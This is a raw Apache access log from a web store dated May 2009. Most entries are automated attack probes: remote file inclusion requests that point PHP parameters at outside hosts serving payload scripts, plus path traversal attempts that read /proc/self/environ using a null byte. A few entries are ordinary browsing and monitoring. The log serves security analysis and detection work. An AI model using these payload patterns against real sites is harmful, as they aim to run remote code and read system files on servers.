118.8.45.150 - - [20/May/2009:05:53:31 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.1" 200 71817 "http://www.acesurgical.com/nuoss_particulates.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:34 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:34 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:34 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:35 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:35 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:35 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:35 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:36 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:36 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:36 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:36 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:37 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:37 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:37 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:37 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:38 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:39 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.8.45.150 - - [20/May/2009:05:53:39 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.147.29.190 - - [20/May/2009:05:53:48 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [20/May/2009:05:53:48 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 232 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
172.16.1.157 - - [20/May/2009:05:54:01 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:05:54:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:05:54:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
88.84.128.40 - - [20/May/2009:05:54:04 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:54:05 -0400] "GET //?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:54:05 -0400] "GET /logs//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.803"
91.206.183.148 - - [20/May/2009:05:54:07 -0400] "GET //update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.206.183.148 - - [20/May/2009:05:54:07 -0400] "GET /logs//update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:54:32 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
217.147.29.190 - - [20/May/2009:05:54:32 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
217.147.29.190 - - [20/May/2009:05:54:32 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
87.106.135.14 - - [20/May/2009:05:54:36 -0400] "GET /logs/access_log.Q108111700//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:54:36 -0400] "GET //?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:54:37 -0400] "GET /logs//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:05:54:39 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.147.29.190 - - [20/May/2009:05:54:42 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:54:42 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:54:45 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:48 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:48 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:48 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:48 -0400] "GET /logs/access_log.Q108021000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:49 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:49 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:49 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:49 -0400] "GET /logs/access_log.Q108021000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:51 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:51 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:51 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:54:51 -0400] "GET /logs/access_log.Q108021000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:54:53 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:54:58 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.122.26.5 - - [20/May/2009:05:55:08 -0400] "GET /logs/access_log.Q109011400%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:55:26 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:55:26 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:55:26 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:55:31 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:55:31 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:55:31 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:55:44 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:55:44 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:55:47 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:55:51 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:05:56:05 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
217.147.29.190 - - [20/May/2009:05:56:06 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
69.237.82.158 - - [20/May/2009:05:56:14 -0400] "GET //update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.237.82.158 - - [20/May/2009:05:56:14 -0400] "GET /logs//update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:56:23 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:56:23 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:56:23 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:56:44 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:56:47 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:56:47 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:56:47 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:05:56:49 -0400] "GET /logs/access_log.Q108102400/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:56:52 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:56:54 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:56:55 -0400] "GET /logs/access_log.Q108021000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:56:57 -0400] "GET /logs/access_log.Q108021000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:56:59 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:56:59 -0400] "GET /logs/access_log.Q108021000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:05:57:00 -0400] "GET /logs/access_log.Q109011400/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:57:08 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:57:29 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [20/May/2009:05:57:56 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
66.249.72.114 - - [20/May/2009:05:58:01 -0400] "GET /images/index5_morslser.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
67.19.228.18 - - [20/May/2009:05:58:03 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
67.19.228.18 - - [20/May/2009:05:58:03 -0400] "GET ///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
67.19.228.18 - - [20/May/2009:05:58:03 -0400] "GET /logs/access_log.Q108112100///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
67.19.228.18 - - [20/May/2009:05:58:05 -0400] "GET ///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
67.19.228.18 - - [20/May/2009:05:58:05 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
67.19.228.18 - - [20/May/2009:05:58:05 -0400] "GET /logs/access_log.Q108112100///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
217.147.29.190 - - [20/May/2009:05:58:18 -0400] "GET /logs/access_log.Q108090200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:05:58:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [20/May/2009:05:58:34 -0400] "GET /logs/access_log.Q108121100//?path%5Bdocroot%5D=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.147.29.190 - - [20/May/2009:05:58:45 -0400] "GET /logs/access_log.Q108101000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.206.183.148 - - [20/May/2009:05:58:48 -0400] "GET /logs//update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
91.206.183.148 - - [20/May/2009:05:58:48 -0400] "GET //update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:59:05 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:59:20 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.1.64.133 - - [20/May/2009:05:59:22 -0400] "GET /logs/access_log.Q108090500//popup_window.php?site_isp_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.1.64.133 - - [20/May/2009:05:59:23 -0400] "GET /logs/access_log.Q108090500/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:05:59:24 -0400] "GET /logs/access_log.Q108090500//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 242 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:05:59:24 -0400] "GET /logs/access_log.Q108090500//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "XXXXXX"
222.122.26.5 - - [20/May/2009:05:59:29 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.26.5 - - [20/May/2009:05:59:30 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:05:59:30 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
